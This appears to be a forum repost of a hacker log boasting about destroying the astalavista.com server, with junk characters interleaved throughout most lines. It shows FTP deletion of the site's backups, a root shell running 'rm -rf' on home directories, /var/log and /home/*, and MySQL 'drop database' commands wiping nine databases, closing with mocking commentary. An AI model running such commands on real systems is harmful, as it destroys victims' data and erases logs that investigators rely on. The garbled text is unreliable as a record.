-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2; g7 a- S& F, P! u3 X8 g$ }9 n, Y& f
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
; ~% a8 ^- j5 Q) j-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar9 y1 Y1 m5 C+ R4 x* o
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar0 F% O; g3 j: M( l- t1 l3 _7 C
[snip]* U- I4 m$ G4 O8 {
226 Transfer complete.
2 P' W2 L+ u) ]+ _$ t2 |* lftp> mdelete *
0 d+ K. ^! i$ {+ l7 eftp> ls -la( Q) M. D2 f4 x
227 Entering Passive Mode (212,254,194,163,2,193)7 ~! ^8 O' x9 J) b$ d7 T- o/ @ A
150 Opening BINARY mode data connection for ‘file list’.
8 h3 p# c3 D% ~3 x! C226 Transfer complete.
% ~5 c4 J" Z! D* d, Zftp>4 H: U# j6 u* h& n, ^# `2 N
3 A* D, j0 v5 y! q( L+ N$ D( U
sh-3.2# cd /home
' b4 }' r& k# K, n5 H9 Ash-3.2# ls -la6 ]) _2 ~8 i8 D' I9 w) j& u
total 120
8 P+ I; Y; L: \3 o1 [2 D( Q7 qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .3 P" U- x, N9 B* A
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 O2 l) Z( p3 |. i
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin& [) B$ F& D5 F6 ]1 o
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group% B9 t' W6 N; D9 X
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
- W- z [) w* T, E8 Sdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
0 @0 ~6 Y1 ] p A; m1 y3 M) y! ldrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
+ J$ t) x- h) ydrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161( `8 e) s: g/ P! y' h+ D
drwx–x–x 10 com com 4096 Apr 28 12:40 com6 M. o( r1 ^: N& p3 r6 n
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
4 F% w7 {: p' [( i* y9 X+ adrwx—— 3 jon jon 4096 Sep 21 2007 jon0 c6 B1 R }1 t) v. d
drwx—— 2 root root 16384 Sep 11 2007 lost+found
! O" x0 v+ m) F! hdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
! F3 j. n0 `# K% p5 ]4 D* Z# t- {drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; K' j6 s0 E* V9 Ndrwx—— 2 jon jon 4096 Sep 15 2007 test7 Q, q" q( Z& r' V1 _, o7 R
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp; p1 S! u7 ~) S8 S: U, j5 ~
3 t4 N" o; t2 Q, i# F6 v2 ish-3.2# rm -rf backup/6 t" o) ^! G g$ r9 p" b0 C! |
sh-3.2# rm -rf backup.14161/6 G: y3 D$ P( l4 i. S2 @
sh-3.2# rm -rf ftp/
! ?3 O+ d) s$ l. Psh-3.2# rm -rf jon/
3 s+ u& |, q6 w2 W- A% W8 ?2 ^sh-3.2# rm -rf my/5 d: x) e2 O* u) l6 C* |' F) e( V
sh-3.2# rm -rf mysqldata/
: N2 `2 S1 E! O$ Y" C& D# hsh-3.2# rm -rf test/( Z/ O3 d7 E& e
sh-3.2# rm -rf tmp/% r+ D' [, A+ x# l/ X" C
sh-3.2# cd ~
( X' B& {/ C7 \" J5 C0 I: o# o8 Tsh-3.2# rm -rf *
& O* i$ k5 a3 s* ^- F, Bsh-3.2# rm -rf /var/log/
3 L ` B6 L" o4 a$ ~5 B( u6 Wrm: cannot remove directory `/var/log//proftpd’: Directory not empty
% i6 Y+ V; a1 ~/ F; ~; ksh-3.2# rm -rf /home/*$ m5 M) E; k, L+ e
sh-3.2# mysql+ ~ o+ P- Y" v* @
Welcome to the MySQL monitor. Commands end with ; or \g./ N0 E/ ]( z; D$ c# ?1 f
Your MySQL connection id is 4071560 ?! h7 a& z1 B" \" U* d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- H' [/ u' m) P5 U5 ], D0 H: Q9 n; Y4 a9 T
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
2 U: Z$ y0 g; p% I0 a% s4 z9 R( O5 c6 ?& H
mysql> show databases;
3 w/ W r* Y/ g( q6 j2 W8 }) s+———————–+3 S8 T) g9 b1 T+ |0 `8 |1 c
| Database |
' s% l- P' t% S: b" d2 u) c5 o+———————–+/ \6 }+ h7 A$ I0 d& l$ Z7 n
| information_schema |
& ]$ i. D$ E2 Q* v; N6 U5 d: v| astanet_ads |# b: c1 x7 e9 b: g
| astanet_mailing_lists |
5 F2 G( T5 E' L0 X% U* A0 M| astanet_mediawiki |
5 h6 L; Z: } X7 t: f' _1 j# q! d| astanet_membersystem |
4 U% d- P. X: a9 L" _| com_contrexx |4 O! i7 ^% g2 ~! ]" r
| com_contrexx2 |
% D M, e2 y& Q- w) f. ~" W4 n| com_contrexx2_live |
, E3 H( x: T; u: n1 n: \| da_roundcube |
: R3 W2 F7 I% X) J$ y| dolphin |: w* ^2 ]1 Q; x+ z/ o' z
| ideapool |0 v) l( ]8 r7 Q0 ~
| mysql |* ?/ H1 S) x' K: s: R
| test |* w8 J# M& J) f* Y- }( E
| yourmaster |; S* e" H3 }1 R) d3 J
+———————–+
# p$ |) m0 f, r14 rows in set (0.03 sec)2 P0 c( R- M- h* N& c- ]1 v0 ~% Y
2 N) Z' d+ I" a/ S, G# B
mysql> drop database astanet_membersystem;( G, v9 ^: z* f3 I
droQuery OK, 46 rows affected (0.81 sec)
( W0 T5 j H: { N! S
* w" J3 g" G3 w4 z& S! m, Dmysql> drop database com_contrexx;
4 }9 ?4 x* ^3 I5 \$ yQuery OK, 211 rows affected (2.72 sec)
' p5 C0 R m4 A# O) O4 i7 F
6 [' }% ^) z2 imysql> drop database com_contrexx2;$ [8 a) p1 g& O3 } ^- K- ]& g
Query OK, 237 rows affected (2.23 sec)
7 Z! _ v9 p9 N; G3 ]5 M& R" \
4 y5 V, b; I7 k) P8 F6 fmysql> drop database com_contrexx2_live;
' W% z& ?3 V6 g- t8 U% E' z6 cQuery OK, 227 rows affected (7.63 sec)
: p9 B" h# ?3 H* }% f: A- c0 g$ O# _% O% g
mysql> drop database ideapool;" P+ a+ ~+ ?8 E& r( Y6 X
Query OK, 69 rows affected (0.19 sec); C# p" O0 a3 b- r# a, Q, L
5 D; z6 Y8 t- _" o) f! cmysql> drop database yourmaster;
' W+ J2 }) r& N5 \' d8 OQuery OK, 158 rows affected (0.55 sec)
. G& f. t/ x1 D3 y: j
6 `8 {5 V1 K' S$ \, V" s \: amysql> drop database astanet_ads;- A( r* ]' A2 q6 s% a
Query OK, 9 rows affected (0.11 sec)
2 o0 c# E4 {. c& j. s# U
, U2 M0 \5 Y' _; I$ ]mysql> drop database astanet_mailing_lists;
9 D' Q- ^: u% Z2 W+ \' p2 ]Query OK, 24 rows affected (1.47 sec)
! Z Z" h8 I& ^) o+ W, \3 B/ n; y! j4 E
mysql> drop database astanet_mediawiki;
/ s# g/ U: H0 w$ q3 iQuery OK, 31 rows affected (0.51 sec)
5 {) q' S. `* ^4 Q ?, X9 _
- P2 _: Z% c/ @7 x. ~$ k1 O a2 Pmysql> show databases;
9 p/ C& y1 L" t* \6 H! y+——————–+: |% R( ~9 e$ Q" L6 l- q9 N
| Database |* Y, `+ x. }% Q$ R
+——————–+
4 K5 [6 i3 ^, X8 X [3 ]| information_schema |+ ?& z2 r4 a* \2 }3 K: g
| da_roundcube |4 |4 p. M6 O& o3 W
| dolphin |
9 K+ r; B8 q: X| mysql |. B& T; E, b+ ~' d4 w8 ?
| test |
& G- i' |! ^ J- Y% |+——————–+
. u b% r! E% {% \' e9 j! ]% n0 [, h5 rows in set (0.00 sec)3 M; J0 s9 A! d! M& E$ W# A
5 v0 c% `' |; {; uWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
! }4 R- R {+ Q, J& [. c# n; z2 \their naming (conventions) but we’re sure Arnold himself wouldn’t be in the- X! X+ F m" P/ s: s4 }4 O' f
wrong to say this pack of morons *wont be back*.
: L! d( ], C9 u( ^& R) k' K |
发表于 2012-11-6 21:07:34
收藏
支持
反对